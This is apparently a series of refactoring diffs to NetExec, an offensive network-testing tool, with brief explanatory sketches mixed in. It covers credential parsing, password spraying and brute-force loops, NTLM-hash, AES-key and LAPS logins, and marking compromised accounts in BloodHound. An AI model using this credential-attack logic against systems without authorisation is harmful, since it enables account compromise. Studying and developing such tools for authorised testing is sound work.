+            self.host, self.is_ipv6, self.is_link_local_ipv6 = gethost_addrinfo(self.hostname)
             if self.args.kerberos:
                 self.host = self.hostname
-            self.logger.info(f"Socket info: host={self.host}, hostname={self.hostname}, kerberos={ 'True' if self.args.kerberos else 'False' }")
+            self.logger.info(f"Socket info: host={self.host}, hostname={self.hostname}, kerberos={self.kerberos}, ipv6={self.is_ipv6}, link-local ipv6={self.is_link_local_ipv6}")
         except Exception as e:
             self.logger.info(f"Error resolving hostname {self.hostname}: {e}")
             return
@@ -152,26 +161,46 @@ class connection(object):
             return

     def proto_flow(self):
-        self.logger.debug(f"Kicking off proto_flow")
+        self.logger.debug("Kicking off proto_flow")
         self.proto_logger()
         if self.create_conn_obj():
+            self.logger.debug("Created connection object")
             self.enum_host_info()
-            if self.print_host_info():
-                # because of null session
-                if self.login() or (self.username == "" and self.password == ""):
-                    if hasattr(self.args, "module") and self.args.module:
-                        self.call_modules()
-                    else:
-                        self.call_cmd_args()
+            if self.print_host_info() and (self.login() or (self.username == "" and self.password == "")):
+                if hasattr(self.args, "module") and self.args.module:
+                    self.logger.debug("Calling modules")
+                    self.call_modules()
+                else:
+                    self.logger.debug("Calling command arguments")
+                    self.call_cmd_args()

     def call_cmd_args(self):
-        for k, v in vars(self.args).items():
-            if hasattr(self, k) and hasattr(getattr(self, k), "__call__"):
-                if v is not False and v is not None:
-                    self.logger.debug(f"Calling {k}()")
-                    r = getattr(self, k)()
+        """Calls all the methods specified by the command line arguments
+
+        Iterates over the attributes of an object (self.args)
+        For each attribute, it checks if the object (self) has an attribute with the same name and if that attribute is callable (i.e., a function)
+        If both conditions are met and the attribute value is not False or None,
+        it calls the function and logs a debug message
+
+        Parameters
+        ----------
+        self (object): The instance of the class.
+
+        Returns
+        -------
+        None
+        """
+        for attr, value in vars(self.args).items():
+            if hasattr(self, attr) and callable(getattr(self, attr)) and value is not False and value is not None:
+                self.logger.debug(f"Calling {attr}()")
+                getattr(self, attr)()

     def call_modules(self):
+        """Calls modules and performs various actions based on the module's attributes.
+
+        It iterates over the modules specified in the command line arguments.
+        For each module, it loads the module and creates a context object, then calls functions based on the module's attributes.
+        """
         for module in self.module:
             self.logger.debug(f"Loading module {module.name} - {module}")
             module_logger = NXCAdapter(
|
||||||
global global_failed_logins
|
global global_failed_logins
|
||||||
global user_failed_logins
|
global user_failed_logins
|
||||||
|
|
||||||
if username not in user_failed_logins.keys():
|
if username not in user_failed_logins:
|
||||||
user_failed_logins[username] = 0
|
user_failed_logins[username] = 0
|
||||||
|
|
||||||
user_failed_logins[username] += 1
|
user_failed_logins[username] += 1
|
||||||
|
@@ -225,53 +254,54 @@ class connection(object):
         if self.failed_logins == self.args.fail_limit:
             return True

-        if username in user_failed_logins.keys():
-            if self.args.ufail_limit == user_failed_logins[username]:
-                return True
+        if username in user_failed_logins and self.args.ufail_limit == user_failed_logins[username]:
+            return True

         return False

     def query_db_creds(self):
-        """
-        Queries the database for credentials to be used for authentication.
+        """Queries the database for credentials to be used for authentication.
+
         Valid cred_id values are:
             - a single cred_id
             - a range specified with a dash (ex. 1-5)
             - 'all' to select all credentials

-        :return: domain[], username[], owned[], secret[], cred_type[]
+        :return: domains[], usernames[], owned[], secrets[], cred_types[]
         """
-        domain = []
-        username = []
+        domains = []
+        usernames = []
         owned = []
-        secret = []
-        cred_type = []
+        secrets = []
+        cred_types = []
         creds = []  # list of tuples (cred_id, domain, username, secret, cred_type, pillaged_from) coming from the database
         data = []  # Arbitrary data needed for the login, e.g. ssh_key

         for cred_id in self.args.cred_id:
-            if isinstance(cred_id, str) and cred_id.lower() == 'all':
+            if cred_id.lower() == "all":
                 creds = self.db.get_credentials()
             else:
                 if not self.db.get_credentials(filter_term=int(cred_id)):
-                    self.logger.error('Invalid database credential ID {}!'.format(cred_id))
+                    self.logger.error(f"Invalid database credential ID {cred_id}!")
                     continue
                 creds.extend(self.db.get_credentials(filter_term=int(cred_id)))

         for cred in creds:
-            c_id, domain_single, username_single, secret_single, cred_type_single, pillaged_from = cred
-            domain.append(domain_single)
-            username.append(username_single)
+            c_id, domain, username, secret, cred_type, pillaged_from = cred
+            domains.append(domain)
+            usernames.append(username)
             owned.append(False)  # As these are likely valid we still want to test them if they are specified in the command line
-            secret.append(secret_single)
-            cred_type.append(cred_type_single)
+            secrets.append(secret)
+            cred_types.append(cred_type)

-        if len(secret) != len(data): data = [None] * len(secret)
-        return domain, username, owned, secret, cred_type, data
+        if len(secrets) != len(data):
+            data = [None] * len(secrets)
+
+        return domains, usernames, owned, secrets, cred_types, data

     def parse_credentials(self):
-        """
-        Parse credentials from the command line or from a file specified.
+        r"""Parse credentials from the command line or from a file specified.
+
         Usernames can be specified with a domain (domain\\username) or without (username).
         If the file contains domain\\username the domain specified will be overwritten by the one in the file.

@@ -286,7 +316,7 @@ class connection(object):
         # Parse usernames
         for user in self.args.username:
             if isfile(user):
-                with open(user, 'r') as user_file:
+                with open(user) as user_file:
                     for line in user_file:
                         if "\\" in line:
                             domain_single, username_single = line.split("\\")
|
||||||
for password in self.args.password:
|
for password in self.args.password:
|
||||||
if isfile(password):
|
if isfile(password):
|
||||||
try:
|
try:
|
||||||
with open(password, 'r', errors = ('ignore' if self.args.ignore_pw_decoding else 'strict')) as password_file:
|
with open(password, errors=("ignore" if self.args.ignore_pw_decoding else "strict")) as password_file:
|
||||||
for line in password_file:
|
for line in password_file:
|
||||||
secret.append(line.strip())
|
secret.append(line.strip())
|
||||||
cred_type.append('plaintext')
|
cred_type.append("plaintext")
|
||||||
except UnicodeDecodeError as e:
|
except UnicodeDecodeError as e:
|
||||||
self.logger.error(f"{type(e).__name__}: Could not decode password file. Make sure the file only contains UTF-8 characters.")
|
self.logger.error(f"{type(e).__name__}: Could not decode password file. Make sure the file only contains UTF-8 characters.")
|
||||||
self.logger.error("You can ignore non UTF-8 characters with the option '--ignore-pw-decoding'")
|
self.logger.error("You can ignore non UTF-8 characters with the option '--ignore-pw-decoding'")
|
||||||
exit(1)
|
sys.exit(1)
|
||||||
|
|
||||||
else:
|
else:
|
||||||
secret.append(password)
|
secret.append(password)
|
||||||
cred_type.append('plaintext')
|
cred_type.append("plaintext")
|
||||||
|
|
||||||
# Parse NTLM-hashes
|
# Parse NTLM-hashes
|
||||||
if hasattr(self.args, "hash") and self.args.hash:
|
if hasattr(self.args, "hash") and self.args.hash:
|
||||||
for ntlm_hash in self.args.hash:
|
for ntlm_hash in self.args.hash:
|
||||||
if isfile(ntlm_hash):
|
if isfile(ntlm_hash):
|
||||||
with open(ntlm_hash, 'r') as ntlm_hash_file:
|
with open(ntlm_hash) as ntlm_hash_file:
|
||||||
for line in ntlm_hash_file:
|
for line in ntlm_hash_file:
|
||||||
secret.append(line.strip())
|
secret.append(line.strip())
|
||||||
cred_type.append('hash')
|
cred_type.append("hash")
|
||||||
else:
|
else:
|
||||||
secret.append(ntlm_hash)
|
secret.append(ntlm_hash)
|
||||||
cred_type.append('hash')
|
cred_type.append("hash")
|
||||||
|
|
||||||
# Parse AES keys
|
# Parse AES keys
|
||||||
if self.args.aesKey:
|
if self.args.aesKey:
|
||||||
for aesKey in self.args.aesKey:
|
for aesKey in self.args.aesKey:
|
||||||
if isfile(aesKey):
|
if isfile(aesKey):
|
||||||
with open(aesKey, 'r') as aesKey_file:
|
with open(aesKey) as aesKey_file:
|
||||||
for line in aesKey_file:
|
for line in aesKey_file:
|
||||||
secret.append(line.strip())
|
secret.append(line.strip())
|
||||||
cred_type.append('aesKey')
|
cred_type.append("aesKey")
|
||||||
else:
|
else:
|
||||||
secret.append(aesKey)
|
secret.append(aesKey)
|
||||||
cred_type.append('aesKey')
|
cred_type.append("aesKey")
|
||||||
|
|
||||||
# Allow trying multiple users with a single password
|
# Allow trying multiple users with a single password
|
||||||
if len(username) > 1 and len(secret) == 1:
|
if len(username) > 1 and len(secret) == 1:
|
||||||
|
@ -356,8 +385,8 @@ class connection(object):
|
||||||
return domain, username, owned, secret, cred_type, [None] * len(secret)
|
return domain, username, owned, secret, cred_type, [None] * len(secret)
|
||||||
|
|
||||||
def try_credentials(self, domain, username, owned, secret, cred_type, data=None):
|
def try_credentials(self, domain, username, owned, secret, cred_type, data=None):
|
||||||
"""
|
"""Try to login using the specified credentials and protocol.
|
||||||
Try to login using the specified credentials and protocol.
|
|
||||||
Possible login methods are:
|
Possible login methods are:
|
||||||
- plaintext (/kerberos)
|
- plaintext (/kerberos)
|
||||||
- NTLM-hash (/kerberos)
|
- NTLM-hash (/kerberos)
|
||||||
|
@@ -367,31 +396,31 @@ class connection(object):
             return False
         if self.args.continue_on_success and owned:
             return False
-        # Enforcing FQDN for SMB if not using local authentication. Related issues/PRs: #26, #28, #24, #38
-        if self.args.protocol == 'smb' and not self.args.local_auth and "." not in domain and not self.args.laps and secret != "" and not (self.domain.upper() == self.hostname.upper()) :
-            self.logger.error(f"Domain {domain} for user {username.rstrip()} need to be FQDN ex:domain.local, not domain")
-            return False
+        if hasattr(self.args, "delegate") and self.args.delegate:
+            self.args.kerberos = True

         with sem:
-            if cred_type == 'plaintext':
+            if cred_type == "plaintext":
                 if self.args.kerberos:
-                    return self.kerberos_login(domain, username, secret, '', '', self.kdcHost, False)
-                elif hasattr(self.args, "domain"): # Some protocolls don't use domain for login
+                    self.logger.debug("Trying to authenticate using Kerberos")
+                    return self.kerberos_login(domain, username, secret, "", "", self.kdcHost, False)
+                elif hasattr(self.args, "domain"):  # Some protocols don't use domain for login
+                    self.logger.debug("Trying to authenticate using plaintext with domain")
                     return self.plaintext_login(domain, username, secret)
-                elif self.args.protocol == 'ssh':
+                elif self.args.protocol == "ssh":
+                    self.logger.debug("Trying to authenticate using plaintext over SSH")
                     return self.plaintext_login(username, secret, data)
                 else:
+                    self.logger.debug("Trying to authenticate using plaintext")
                     return self.plaintext_login(username, secret)
-            elif cred_type == 'hash':
+            elif cred_type == "hash":
                 if self.args.kerberos:
-                    return self.kerberos_login(domain, username, '', secret, '', self.kdcHost, False)
+                    return self.kerberos_login(domain, username, "", secret, "", self.kdcHost, False)
                 return self.hash_login(domain, username, secret)
-            elif cred_type == 'aesKey':
-                return self.kerberos_login(domain, username, '', '', secret, self.kdcHost, False)
+            elif cred_type == "aesKey":
+                return self.kerberos_login(domain, username, "", "", secret, self.kdcHost, False)

     def login(self):
-        """
-        Try to login using the credentials specified in the command line or in the database.
+        """Try to login using the credentials specified in the command line or in the database.

         :return: True if the login was successful and "--continue-on-success" was not specified, False otherwise.
         """
@ -423,6 +452,7 @@ class connection(object):
|
||||||
data.extend(parsed_data)
|
data.extend(parsed_data)
|
||||||
|
|
||||||
if self.args.use_kcache:
|
if self.args.use_kcache:
|
||||||
|
self.logger.debug("Trying to authenticate using Kerberos cache")
|
||||||
with sem:
|
with sem:
|
||||||
username = self.args.username[0] if len(self.args.username) else ""
|
username = self.args.username[0] if len(self.args.username) else ""
|
||||||
password = self.args.password[0] if len(self.args.password) else ""
|
password = self.args.password[0] if len(self.args.password) else ""
|
||||||
|
@ -430,6 +460,13 @@ class connection(object):
|
||||||
self.logger.info("Successfully authenticated using Kerberos cache")
|
self.logger.info("Successfully authenticated using Kerberos cache")
|
||||||
return True
|
return True
|
||||||
|
|
||||||
|
if hasattr(self.args, "laps") and self.args.laps:
|
||||||
|
self.logger.debug("Trying to authenticate using LAPS")
|
||||||
|
username[0], secret[0], domain[0], ntlm_hash = laps_search(self, username, secret, cred_type, domain)
|
||||||
|
cred_type = ["plaintext"]
|
||||||
|
if not (username[0] or secret[0] or domain[0]):
|
||||||
|
return False
|
||||||
|
|
||||||
if not self.args.no_bruteforce:
|
if not self.args.no_bruteforce:
|
||||||
for secr_index, secr in enumerate(secret):
|
for secr_index, secr in enumerate(secret):
|
||||||
for user_index, user in enumerate(username):
|
for user_index, user in enumerate(username):
|
||||||
|
|
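The core of `try_credentials()` is a dispatch on `cred_type`: plaintext secrets and NTLM hashes can go either through Kerberos or the protocol's native login, while AES keys only make sense for Kerberos. A simplified sketch of that branch structure, with locking, logging and the SSH special case omitted (`conn` stands in for the connection object):

```python
def dispatch_login(conn, domain, username, secret, cred_type, kdc_host):
    """Condensed view of the try_credentials() dispatch in the diff above."""
    if cred_type == "plaintext":
        if conn.args.kerberos:
            return conn.kerberos_login(domain, username, secret, "", "", kdc_host, False)
        return conn.plaintext_login(domain, username, secret)
    elif cred_type == "hash":
        if conn.args.kerberos:
            return conn.kerberos_login(domain, username, "", secret, "", kdc_host, False)
        return conn.hash_login(domain, username, secret)
    elif cred_type == "aesKey":
        # AES keys are only usable through Kerberos
        return conn.kerberos_login(domain, username, "", "", secret, kdc_host, False)
```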
@@ -1,6 +1,3 @@
-#!/usr/bin/env python3
-# -*- coding: utf-8 -*-
-
 import configparser
 import os

@@ -18,4 +15,3 @@ class Context:
         self.conf.read(os.path.expanduser("~/.nxc/nxc.conf"))

         self.log = logger
-        # self.log.debug = logging.debug
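For reference, the configuration the Context object reads is a plain INI file; a hedged sketch of loading it directly with configparser (the `nxc`/`workspace` names come from the new database helpers further down, the fallback value is mine):

```python
import configparser
import os

conf = configparser.ConfigParser()
conf.read(os.path.expanduser("~/.nxc/nxc.conf"))
workspace = conf.get("nxc", "workspace", fallback="default")
print(f"Active workspace: {workspace}")
```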
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
@@ -0,0 +1,97 @@
+import sys
+import configparser
+import shutil
+from sqlalchemy import create_engine
+from sqlite3 import connect
+from os import mkdir
+from os.path import exists
+from os.path import join as path_join
+
+from nxc.loaders.protocolloader import ProtocolLoader
+from nxc.paths import WORKSPACE_DIR
+
+
+def create_db_engine(db_path):
+    return create_engine(f"sqlite:///{db_path}", isolation_level="AUTOCOMMIT", future=True)
+
+
+def open_config(config_path):
+    try:
+        config = configparser.ConfigParser()
+        config.read(config_path)
+    except Exception as e:
+        print(f"[-] Error reading nxc.conf: {e}")
+        sys.exit(1)
+    return config
+
+
+def get_workspace(config):
+    return config.get("nxc", "workspace")
+
+
+def set_workspace(config_path, workspace_name):
+    config = open_config(config_path)
+    config.set("nxc", "workspace", workspace_name)
+    write_configfile(config, config_path)
+    print(f"[*] Workspace set to {workspace_name}")
+
+
+def get_db(config):
+    return config.get("nxc", "last_used_db")
+
+
+def write_configfile(config, config_path):
+    with open(config_path, "w") as configfile:
+        config.write(configfile)
+
+
+def create_workspace(workspace_name, p_loader=None):
+    """
+    Create a new workspace with the given name.
+
+    Args:
+    ----
+        workspace_name (str): The name of the workspace.
+
+    Returns:
+    -------
+        None
+    """
+    if exists(path_join(WORKSPACE_DIR, workspace_name)):
+        print(f"[-] Workspace {workspace_name} already exists")
+    else:
+        print(f"[*] Creating {workspace_name} workspace")
+        mkdir(path_join(WORKSPACE_DIR, workspace_name))
+
+    if p_loader is None:
+        p_loader = ProtocolLoader()
+    protocols = p_loader.get_protocols()
+
+    for protocol in protocols:
+        protocol_object = p_loader.load_protocol(protocols[protocol]["dbpath"])
+        proto_db_path = path_join(WORKSPACE_DIR, workspace_name, f"{protocol}.db")
+
+        if not exists(proto_db_path):
+            print(f"[*] Initializing {protocol.upper()} protocol database")
+            conn = connect(proto_db_path)
+            c = conn.cursor()
+
+            # try to prevent some weird sqlite I/O errors
+            c.execute("PRAGMA journal_mode = OFF")
+            c.execute("PRAGMA foreign_keys = 1")
+
+            protocol_object.database.db_schema(c)
+
+            # commit the changes and close everything off
+            conn.commit()
+            conn.close()
+
+
+def delete_workspace(workspace_name):
+    shutil.rmtree(path_join(WORKSPACE_DIR, workspace_name))
+    print(f"[*] Workspace {workspace_name} deleted")
+
+
+def initialize_db():
+    if not exists(path_join(WORKSPACE_DIR, "default")):
+        create_workspace("default")
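A short usage sketch of the new workspace helpers, assuming the new file lands at `nxc/database.py` as the import change in first_run.py below suggests; the workspace name is illustrative:

```python
from nxc.database import initialize_db, create_workspace, set_workspace
from nxc.paths import CONFIG_PATH

initialize_db()                                # make sure the "default" workspace exists
create_workspace("acme_engagement")            # creates one .db per loaded protocol
set_workspace(CONFIG_PATH, "acme_engagement")  # persists the choice in nxc.conf
```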
@@ -1,12 +1,9 @@
-#!/usr/bin/env python3
-# -*- coding: utf-8 -*-
-
 from os import mkdir
 from os.path import exists
 from os.path import join as path_join
 import shutil
-from nxc.paths import nxc_PATH, CONFIG_PATH, TMP_PATH, DATA_PATH
-from nxc.nxcdb import initialize_db
+from nxc.paths import NXC_PATH, CONFIG_PATH, TMP_PATH, DATA_PATH
+from nxc.database import initialize_db
 from nxc.logger import nxc_logger


@@ -14,10 +11,10 @@ def first_run_setup(logger=nxc_logger):
     if not exists(TMP_PATH):
         mkdir(TMP_PATH)

-    if not exists(nxc_PATH):
+    if not exists(NXC_PATH):
         logger.display("First time use detected")
         logger.display("Creating home directory structure")
-        mkdir(nxc_PATH)
+        mkdir(NXC_PATH)

         folders = (
             "logs",
@@ -28,30 +25,17 @@ def first_run_setup(logger=nxc_logger):
             "screenshots",
         )
         for folder in folders:
-            if not exists(path_join(nxc_PATH, folder)):
+            if not exists(path_join(NXC_PATH, folder)):
                 logger.display(f"Creating missing folder {folder}")
-                mkdir(path_join(nxc_PATH, folder))
+                mkdir(path_join(NXC_PATH, folder))

-    initialize_db(logger)
+    initialize_db()

     if not exists(CONFIG_PATH):
         logger.display("Copying default configuration file")
         default_path = path_join(DATA_PATH, "nxc.conf")
-        shutil.copy(default_path, nxc_PATH)
+        shutil.copy(default_path, NXC_PATH)

     # if not exists(CERT_PATH):
-    # logger.display('Generating SSL certificate')
-    # try:
-    # check_output(['openssl', 'help'], stderr=PIPE)
     # if os.name != 'nt':
-    # os.system('openssl req -new -x509 -keyout {path} -out {path} -days 365 -nodes -subj "/C=US" > /dev/null 2>&1'.format(path=CERT_PATH))
-    # else:
-    # os.system('openssl req -new -x509 -keyout {path} -out {path} -days 365 -nodes -subj "/C=US"'.format(path=CERT_PATH))
-    # except OSError as e:
     # if e.errno == errno.ENOENT:
-    # logger.error('OpenSSL command line utility is not installed, could not generate certificate, using default certificate')
-    # default_path = path_join(DATA_PATH, 'default.pem')
-    # shutil.copy(default_path, CERT_PATH)
-    # else:
-    # logger.error('Error while generating SSL certificate: {}'.format(e))
-    # sys.exit(1)
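The first-run setup boils down to an idempotent bootstrap: create the home directory, create any missing sub-folders, then initialize the databases and copy the default configuration. A minimal sketch of that pattern (the folder tuple here is truncated to the two names visible in the hunk; the full list lives in first_run.py):

```python
from os import mkdir
from os.path import exists, join as path_join


def ensure_folders(base_path, folders=("logs", "screenshots")):
    """Create base_path and any missing sub-folders, skipping what already exists."""
    if not exists(base_path):
        mkdir(base_path)
    for folder in folders:
        if not exists(path_join(base_path, folder)):
            mkdir(path_join(base_path, folder))
```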
@@ -1,9 +1,7 @@
-#!/usr/bin/env python3
-# -*- coding: utf-8 -*-
 import os
 from nxc.paths import DATA_PATH


 def get_script(path):
-    with open(os.path.join(DATA_PATH, path), "r") as script:
+    with open(os.path.join(DATA_PATH, path)) as script:
         return script.read()
@@ -1,18 +1,32 @@
-#!/usr/bin/env python3
-# -*- coding: utf-8 -*-
-
-
 def add_user_bh(user, domain, logger, config):
+    """Adds a user to the BloodHound graph database.
+
+    Args:
+    ----
+        user (str or list): The username of the user or a list of user dictionaries.
+        domain (str): The domain of the user.
+        logger (Logger): The logger object for logging messages.
+        config (ConfigParser): The configuration object for accessing BloodHound settings.
+
+    Returns:
+    -------
+        None
+
+    Raises:
+    ------
+        AuthError: If the provided Neo4J credentials are not valid.
+        ServiceUnavailable: If Neo4J is not available on the specified URI.
+        Exception: If an unexpected error occurs with Neo4J.
+    """
     users_owned = []
     if isinstance(user, str):
         users_owned.append({"username": user.upper(), "domain": domain.upper()})
     else:
         users_owned = user

     if config.get("BloodHound", "bh_enabled") != "False":
-        try:
-            from neo4j.v1 import GraphDatabase
-        except:
-            from neo4j import GraphDatabase
+        # we do a conditional import here to avoid loading these if BH isn't enabled
+        from neo4j import GraphDatabase
         from neo4j.exceptions import AuthError, ServiceUnavailable

         uri = f"bolt://{config.get('BloodHound', 'bh_uri')}:{config.get('BloodHound', 'bh_port')}"
@@ -26,30 +40,64 @@ def add_user_bh(user, domain, logger, config):
             encrypted=False,
         )
         try:
-            with driver.session() as session:
-                with session.begin_transaction() as tx:
-                    for info in users_owned:
-                        if info["username"][-1] == "$":
-                            user_owned = info["username"][:-1] + "." + info["domain"]
-                            account_type = "Computer"
-                        else:
-                            user_owned = info["username"] + "@" + info["domain"]
-                            account_type = "User"
-
-                        result = tx.run(f'MATCH (c:{account_type} {{name:"{user_owned}"}}) RETURN c')
-
-                        if result.data()[0]["c"].get("owned") in (False, None):
-                            logger.debug(f'MATCH (c:{account_type} {{name:"{user_owned}"}}) SET c.owned=True RETURN c.name AS name')
-                            result = tx.run(f'MATCH (c:{account_type} {{name:"{user_owned}"}}) SET c.owned=True RETURN c.name AS name')
-                            logger.highlight(f"Node {user_owned} successfully set as owned in BloodHound")
-        except AuthError as e:
+            with driver.session().begin_transaction() as tx:
+                for user_info in users_owned:
+                    distinguished_name = "".join([f"DC={dc}," for dc in user_info["domain"].split(".")]).rstrip(",")
+                    domain_query = tx.run(f"MATCH (d:Domain) WHERE d.distinguishedname STARTS WITH '{distinguished_name}' RETURN d").data()
+                    if not domain_query:
+                        logger.debug(f"Domain {user_info['domain']} not found in BloodHound. Falling back to domainless query.")
+                        _add_without_domain(user_info, tx, logger)
+                    else:
+                        domain = domain_query[0]["d"].get("name")
+                        _add_with_domain(user_info, domain, tx, logger)
+        except AuthError:
             logger.fail(f"Provided Neo4J credentials ({config.get('BloodHound', 'bh_user')}:{config.get('BloodHound', 'bh_pass')}) are not valid.")
             return
-        except ServiceUnavailable as e:
+        except ServiceUnavailable:
             logger.fail(f"Neo4J does not seem to be available on {uri}.")
             return
         except Exception as e:
-            logger.fail("Unexpected error with Neo4J")
-            logger.fail("Account not found on the domain")
+            logger.fail(f"Unexpected error with Neo4J: {e}")
             return
         driver.close()
+
+
+def _add_with_domain(user_info, domain, tx, logger):
+    if user_info["username"][-1] == "$":
+        user_owned = f"{user_info['username'][:-1]}.{domain}"
+        account_type = "Computer"
+    else:
+        user_owned = f"{user_info['username']}@{domain}"
+        account_type = "User"
+
+    result = tx.run(f"MATCH (c:{account_type} {{name:'{user_owned}'}}) RETURN c").data()
+
+    if len(result) == 0:
+        logger.fail("Account not found in the BloodHound database.")
+        return
+    if result[0]["c"].get("owned") in (False, None):
+        logger.debug(f"MATCH (c:{account_type} {{name:'{user_owned}'}}) SET c.owned=True RETURN c.name AS name")
+        result = tx.run(f"MATCH (c:{account_type} {{name:'{user_owned}'}}) SET c.owned=True RETURN c.name AS name").data()[0]
+        logger.highlight(f"Node {result['name']} successfully set as owned in BloodHound")
+
+
+def _add_without_domain(user_info, tx, logger):
+    if user_info["username"][-1] == "$":
+        user_owned = user_info["username"][:-1]
+        account_type = "Computer"
+    else:
+        user_owned = user_info["username"]
+        account_type = "User"
+
+    result = tx.run(f"MATCH (c:{account_type}) WHERE c.name STARTS WITH '{user_owned}' RETURN c").data()
+
+    if len(result) == 0:
+        logger.fail("Account not found in the BloodHound database.")
+        return
+    elif len(result) >= 2:
+        logger.fail(f"Multiple accounts found with the name '{user_info['username']}' in the BloodHound database. Please specify the FQDN ex:domain.local")
+        return
+    elif result[0]["c"].get("owned") in (False, None):
+        logger.debug(f"MATCH (c:{account_type} {{name:'{result[0]['c']['name']}'}}) SET c.owned=True RETURN c.name AS name")
+        result = tx.run(f"MATCH (c:{account_type} {{name:'{result[0]['c']['name']}'}}) SET c.owned=True RETURN c.name AS name").data()[0]
+        logger.highlight(f"Node {result['name']} successfully set as owned in BloodHound")
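A hedged sketch of what the new `_add_with_domain()` helper does: look the node up by name and only issue the `SET c.owned=True` write when it is not already owned. The URI and credentials below are placeholders (NetExec reads them from the `[BloodHound]` section of nxc.conf), and the explicit `tx.commit()` is mine, added for clarity:

```python
from neo4j import GraphDatabase


def mark_owned(uri, user, password, name, account_type="User"):
    """Flag a BloodHound node as owned, mirroring _add_with_domain() above."""
    driver = GraphDatabase.driver(uri, auth=(user, password), encrypted=False)
    with driver.session().begin_transaction() as tx:
        result = tx.run(f"MATCH (c:{account_type} {{name:'{name}'}}) RETURN c").data()
        if result and result[0]["c"].get("owned") in (False, None):
            tx.run(f"MATCH (c:{account_type} {{name:'{name}'}}) SET c.owned=True RETURN c.name AS name")
        tx.commit()
    driver.close()


# mark_owned("bolt://127.0.0.1:7687", "neo4j", "bloodhound", "JDOE@CORP.LOCAL")
```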
@@ -1,6 +1,3 @@
-#!/usr/bin/env python3
-# -*- coding: utf-8 -*-
-
 import random

@@ -1,6 +1,3 @@
-#!/usr/bin/env python3
-# -*- coding: utf-8 -*-
-
 import os
 from termcolor import colored

@@ -1,6 +1,3 @@
-#!/usr/bin/env python3
-# -*- coding: utf-8 -*-
-
 import random
 import string
 import re
@@ -9,7 +6,7 @@ import os


 def identify_target_file(target_file):
-    with open(target_file, "r") as target_file_handle:
+    with open(target_file) as target_file_handle:
         for i, line in enumerate(target_file_handle):
             if i == 1:
                 if line.startswith("<NessusClientData"):
@@ -26,10 +23,7 @@ def gen_random_string(length=10):

 def validate_ntlm(data):
     allowed = re.compile("^[0-9a-f]{32}", re.IGNORECASE)
-    if allowed.match(data):
-        return True
-    else:
-        return False
+    return bool(allowed.match(data))


 def called_from_cmd_args():
@@ -45,12 +39,10 @@ def called_from_cmd_args():

 # Stolen from https://github.com/pydanny/whichcraft/
 def which(cmd, mode=os.F_OK | os.X_OK, path=None):
-    """Given a command, mode, and a PATH string, return the path which
-    conforms to the given mode on the PATH, or None if there is no such
-    file.
-    `mode` defaults to os.F_OK | os.X_OK. `path` defaults to the result
-    of os.environ.get("PATH"), or can be overridden with a custom search
-    path.
+    """Find the path which conforms to the given mode on the PATH for a command.
+
+    Given a command, mode, and a PATH string, return the path which conforms to the given mode on the PATH, or None if there is no such file.
+    `mode` defaults to os.F_OK | os.X_OK. `path` defaults to the result of os.environ.get("PATH"), or can be overridden with a custom search path.
     Note: This function was backported from the Python 3 source code.
     """
@@ -77,12 +69,11 @@ def which(cmd, mode=os.F_OK | os.X_OK, path=None):
     files = [cmd]

     seen = set()
-    for dir in path:
-        normdir = os.path.normcase(dir)
+    for p in path:
+        normdir = os.path.normcase(p)
         if normdir not in seen:
             seen.add(normdir)
             for thefile in files:
-                name = os.path.join(dir, thefile)
+                name = os.path.join(p, thefile)
                 if _access_check(name, mode):
                     return name
-    return None
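The `validate_ntlm()` simplification above is a straightforward boolean-return cleanup; a quick self-contained check that the regex behaves as expected:

```python
import re


def validate_ntlm(data):
    # Same check as in the diff: 32 leading hexadecimal characters.
    return bool(re.compile("^[0-9a-f]{32}", re.IGNORECASE).match(data))


assert validate_ntlm("aad3b435b51404eeaad3b435b51404ee") is True
assert validate_ntlm("not-a-hash") is False
```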
@@ -12,7 +12,8 @@ Authors:
 Guillaume DAUMAS (@BlWasp_)
 Lucien DOUSTALY (@Wlayzz)

-References:
+References
+----------
 MS-ADA1, MS-ADA2, MS-ADA3 Active Directory Schema Attributes and their GUID:
 - [MS-ADA1] https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-ada1/19528560-f41e-4623-a406-dabcfff0660f
 - [MS-ADA2] https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-ada2/e20ebc4e-5285-40ba-b3bd-ffcb81c2783e
@@ -22,6 +23,7 @@ References:

 This library is, for the moment, not present in the Impacket version used by NetExec, so I add it manually in helpers.

 """

 SCHEMA_OBJECTS = {
@@ -0,0 +1,34 @@
+# Original from here: https://github.com/fortra/impacket/blob/master/examples/DumpNTLMInfo.py#L568
+
+import struct
+
+from impacket import ntlm
+from impacket.smb3 import WIN_VERSIONS
+import contextlib
+
+
+def parse_challenge(challange):
+    target_info = {
+        "hostname": None,
+        "domain": None,
+        "os_version": None
+    }
+    challange = ntlm.NTLMAuthChallenge(challange)
+    av_pairs = ntlm.AV_PAIRS(challange["TargetInfoFields"][:challange["TargetInfoFields_len"]])
+    if av_pairs[ntlm.NTLMSSP_AV_HOSTNAME] is not None:
+        with contextlib.suppress(Exception):
+            target_info["hostname"] = av_pairs[ntlm.NTLMSSP_AV_HOSTNAME][1].decode("utf-16le")
+    if av_pairs[ntlm.NTLMSSP_AV_DNS_DOMAINNAME] is not None:
+        with contextlib.suppress(Exception):
+            target_info["domain"] = av_pairs[ntlm.NTLMSSP_AV_DNS_DOMAINNAME][1].decode("utf-16le")
+    if "Version" in challange.fields:
+        version = challange["Version"]
+        if len(version) >= 4:
+            major_version = version[0]
+            minor_version = version[1]
+            product_build = struct.unpack("<H", version[2:4])[0]
+            if product_build in WIN_VERSIONS:
+                target_info["os_version"] = f"{WIN_VERSIONS[product_build]} Build {product_build}"
+            else:
+                target_info["os_version"] = f"{major_version}.{minor_version} Build {product_build}"
+    return target_info
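Usage sketch for the new NTLM parser: `parse_challenge()` takes the raw bytes of an NTLM CHALLENGE (Type 2) message, for example one captured during SMB session setup. The import path below is an assumption based on where the other helpers live:

```python
from nxc.helpers.ntlm_parser import parse_challenge  # assumed module path


def summarize_target(challenge_bytes):
    """Pretty-print the hostname/domain/OS build extracted from a raw
    NTLMSSP CHALLENGE blob."""
    info = parse_challenge(challenge_bytes)
    return f"{info['hostname']} (domain: {info['domain']}, OS: {info['os_version']})"
```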
@ -1,5 +1,3 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
import os
|
import os
|
||||||
import re
|
import re
|
||||||
from sys import exit
|
from sys import exit
|
||||||
|
@ -8,35 +6,80 @@ from random import choice, sample
|
||||||
from subprocess import call
|
from subprocess import call
|
||||||
from nxc.helpers.misc import which
|
from nxc.helpers.misc import which
|
||||||
